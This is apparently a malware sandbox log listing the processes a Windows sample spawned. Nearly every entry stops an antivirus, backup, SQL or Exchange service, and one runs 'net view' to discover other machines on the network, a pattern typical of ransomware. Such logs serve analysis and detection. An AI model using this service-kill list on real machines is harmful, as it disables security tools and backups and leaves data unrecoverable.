C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y1⤵PID:15304
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y1⤵PID:15228
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer /y1⤵PID:15220
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y1⤵PID:15208
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$PROD /y1⤵PID:15200
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPS /y1⤵PID:15192
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SamSs /y1⤵PID:15184
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y1⤵PID:15168
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SAVService /y1⤵PID:15152
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y1⤵PID:15144
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ShMonitor /y1⤵PID:15132
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Smcinst /y1⤵PID:15124
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AVP /y1⤵PID:15116
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WRSVC /y1⤵PID:15108
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SAVAdminService /y1⤵PID:15100
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y1⤵PID:15092
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y1⤵PID:15076
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y1⤵PID:15060
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y1⤵PID:15052
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y1⤵PID:15044
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeSA /y1⤵PID:15028
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Agent” /y1⤵PID:15020
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Clean Service” /y1⤵PID:15012
-
C:\Windows\SysWOW64\net.exenet view1⤵
- Discovers systems in the same network
PID:14944
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLSafeOLRService /y1⤵PID:14560
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y1⤵PID:14184
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msftesql$PROD /y1⤵PID:14176
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos File Scanner Service” /y1⤵PID:14168
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sms_site_sql_backup /y1⤵PID:14160
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y1⤵PID:14152
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y1⤵PID:14144
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y1⤵PID:14136
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “SQLsafe Filter Service” /y1⤵PID:14128
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfevtp /y1⤵PID:14120
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop swi_update /y1⤵PID:14112
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop swi_filter /y1⤵PID:14104
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TrueKeyScheduler /y1⤵PID:14096
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y1⤵PID:14080
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SOPHOS /y1⤵PID:14072
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLBrowser /y1⤵PID:14064
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y1⤵PID:14056
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TrueKey /y1⤵PID:14048
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mssql$vim_sqlexp /y1⤵PID:14040
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RESvc /y1⤵PID:14032
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Health Service” /y1⤵PID:14024
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sophossps /y1⤵PID:14016
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLSERVERAGENT /y1⤵PID:14008
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPSAMA /y1⤵PID:14000
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeIS /y1⤵PID:13992
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TrueKeyServiceHelper /y1⤵PID:13984
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TmCCSF /y1⤵PID:13976
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Safestore Service” /y1⤵PID:13912
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Message Router” /y1⤵PID:13904
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPSAMA /y1⤵PID:13848
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Zoolz 2 Service” /y1⤵PID:13832
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$ECWDB2 /y1⤵PID:13820
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROD /y1⤵PID:13732
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SstpSvc /y1⤵PID:13724
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y1⤵PID:13716
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y1⤵PID:13708
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ARSM /y1⤵PID:13564
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wbengine /y1⤵PID:13324
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y1⤵PID:2640
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Client” /y1⤵PID:9932
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y1⤵PID:4260
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y1⤵PID:4476
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y1⤵PID:4796
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y1⤵PID:9756
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamCatalogSvc /y1⤵PID:8528
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamCloudSvc /y1⤵PID:4624
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop OracleClientCache80 /y1⤵PID:2392
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y1⤵PID:8832
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeSRS /y1⤵PID:13136
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “aphidmonitorservice” /y1⤵PID:13124
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EhttpSrv /y1⤵PID:13092
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeES /y1⤵PID:13084
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MsDtsServer /y1⤵PID:13076
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EPSecurityService /y1⤵PID:13068
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wbengine /y1⤵PID:13060
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ntrtscan /y1⤵PID:13052
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploySvc /y1⤵PID:13044
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Acronis VSS Provider” /y1⤵PID:13036
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EsgShKernel /y1⤵PID:13028
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McShield /y1⤵PID:13020
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y1⤵PID:13012
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop IISAdmin /y1⤵PID:13004
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper /y1⤵PID:12996
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y1⤵PID:12988
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y1⤵PID:12980
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y1⤵PID:12972
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MsDtsServer100 /y1⤵PID:12964
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ESHASRV /y1⤵PID:12956
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop PDVFSService /y1⤵PID:12948
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y1⤵PID:12940
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y1⤵PID:12932
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamRESTSvc /y1⤵PID:12924
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y1⤵PID:12884
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EPUpdateService /y1⤵PID:12868
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y1⤵PID:12824
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y1⤵PID:12816
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamMountSvc /y1⤵PID:12808
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y1⤵PID:12800
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EraserSvc11710 /y1⤵PID:12792
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McTaskManager /y1⤵PID:12772
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “SQL Backups /y1⤵PID:12764
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLSERVER /y1⤵PID:12756
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfefire /y1⤵PID:12748
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfemms /y1⤵PID:12740
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y1⤵PID:12732
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecDeviceMediaService /y1⤵PID:12724
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ekrn /y1⤵PID:12716
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y1⤵PID:12708
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop FA_Scheduler /y1⤵PID:12700
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mozyprobackup /y1⤵PID:12692
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MMS /y1⤵PID:12684
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$TPSAMA /y1⤵PID:12676
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SDRSVC /y1⤵PID:12668
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y1⤵PID:12660
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y1⤵PID:12652
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPS /y1⤵PID:12556
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y1⤵PID:12300
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeFramework /y1⤵PID:12292
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop masvc /y1⤵PID:10188
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y1⤵PID:8584
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper100 /y1⤵PID:8472
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MBAMService /y1⤵PID:9368
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MySQL57 /y1⤵PID:7548
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeEngineService /y1⤵PID:8760
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerOLAPService /y1⤵PID:672
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MBEndpointAgent /y1⤵PID:4448
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y1⤵PID:1440
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Enterprise Client Service” /y1⤵PID:9724
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y1⤵PID:9876
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Agent” /y1⤵PID:9964
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$TPS /y1⤵PID:9884
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamBrokerSvc /y1⤵PID:10124
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y1⤵PID:9788
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamBackupSvc /y1⤵PID:10164
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y1⤵PID:8568
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop KAVFS /y1⤵PID:8536
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop KAVFSGT /y1⤵PID:12268
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop kavfsslp /y1⤵PID:11828
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MySQL80 /y1⤵PID:11820
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y1⤵PID:11812
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y1⤵PID:11804
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y1⤵PID:11796
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop PDVFSService /y1⤵PID:11788
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop veeam /y1⤵PID:11780
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y1⤵PID:11772
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RTVscan /y1⤵PID:1240
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y1⤵PID:2344
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y1⤵PID:4900
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start FDResPub /y1⤵PID:4568
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s upnphost1⤵PID:4524
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfewc /y1⤵PID:212
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:3612